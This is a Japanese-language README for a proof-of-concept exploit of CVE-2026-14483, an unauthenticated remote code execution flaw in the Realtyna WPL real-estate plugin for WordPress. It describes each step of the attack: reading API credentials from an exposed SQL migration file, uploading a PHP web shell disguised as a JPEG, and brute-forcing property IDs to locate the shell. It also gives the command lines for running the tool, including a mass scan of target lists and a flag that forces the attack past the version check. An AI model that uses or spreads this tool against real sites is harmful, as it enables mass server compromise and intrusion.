
CVE-2026-14483 POC EXPLOIT BY MADEXPLOITS
WordPressプラグイン Realtyna WPL Real Estate Listing に対する未認証のリモートコード実行。
| フィールド | 詳細 |
|---|
| CVE | CVE-2026-14483 |
| 影響を受けるバージョン | <= 5.2.0 |
| プラグイン | real-estate-listing-realtyna-wpl |
| 影響 | 未認証のPHPウェブシェルアップロード(RCE) |
| スクリプト | CVE-2026-14483.py |
| 作者 | MADEXPLOITS |
デフォルトでは、このスクリプトはWPL 5.2.0 を実行しているターゲットのみを攻撃します。上書きするには
--forceを使用してください。

api_key / api_secret が、公開されたSQLマイグレーションダンプを介して露出しています。set_property)を認証し、細工されたPHPファイルを物件画像としてアップロードできるようにします。wp-content/uploads/WPL/{property_id}/ 配下に配置されます。pip install requests colorama
1行に1つのベースURLを記述したテキストファイルを作成します:
http://wplab.test
https://example.com
python CVE-2026-14483.py --targets targets.txt
成功したシェルのURLは result.txt(または --output)に追記されます。
python CVE-2026-14483.py \
--targets targets.txt \
--output result.txt \
--user-id 1 \
--max-id 1000 \
--timeout 30 \
--threads 5 \
--debug \
--force
| 引数 | デフォルト | 説明 |
|---|---|---|
--targets | (必須) | ベースURLを含むファイル(1行につき1つ) |
--output | result.txt | 見つかったシェルURLを追記するファイル |
--user-id | 1 | 新しい物件を所有するWordPress / WPLユーザーID |
--payload | 組み込みのアップロードシェル | カスタムPHPペイロード文字列 |
--max-id | 1000 | シェルの場所を特定する際にブルートフォースする物件IDの最大値 |
--timeout | 30 | HTTPタイムアウト(秒) |
--threads | 5 | 同時実行するワーカースレッド数 |
--debug | オフ | 詳細なデバッグログ出力 |
--force | オフ | バージョンが5.2.0以外、またはバージョンを検出できない場合でも攻撃を実行 |
Target URL
│
▼
Detect WPL version (readme.txt / wpl.php)
│ skip unless == 5.2.0 (or --force)
▼
Fetch api_key + api_secret from:
/wp-content/plugins/real-estate-listing-realtyna-wpl/assets/migrations/basic/1.0.0.sql
│
▼
POST set_property via WPL I/O API
(upload image_0x89MADEXPLOITS.php as image/jpeg)
│
▼
Brute-force property ID 1..max-id
/wp-content/uploads/WPL/{id}/0x89MADEXPLOITS.php
│
▼
Write shell URL → output file
デフォルトのシェルマーカー: MADEXPLOITS
デフォルトのリモートファイル名: 0x89MADEXPLOITS.php
単一のラボターゲット(このワークスペース):
echo http://wplab.test > targets.txt
python CVE-2026-14483.py --targets targets.txt --debug
より高い同時実行数でのマススキャン:
python CVE-2026-14483.py --targets targets.txt --threads 20 --output shells.txt
バージョンチェックが失敗した場合に攻撃を強制:
python CVE-2026-14483.py --targets targets.txt --force
[+] Shell found: http://target/wp-content/uploads/WPL/32/0x89MADEXPLOITS.php
[*] Progress: 1/1 | Found: 1
[+] Done. Found 1 shell(s). Check 'result.txt' for URLs.
result.txt には1行につき1つのシェルURLが含まれます。
readme.txt 内の Stable tag: / Version: から読み取られ、フォールバックとして wpl.php が使用されます。--max-id を引き上げてください。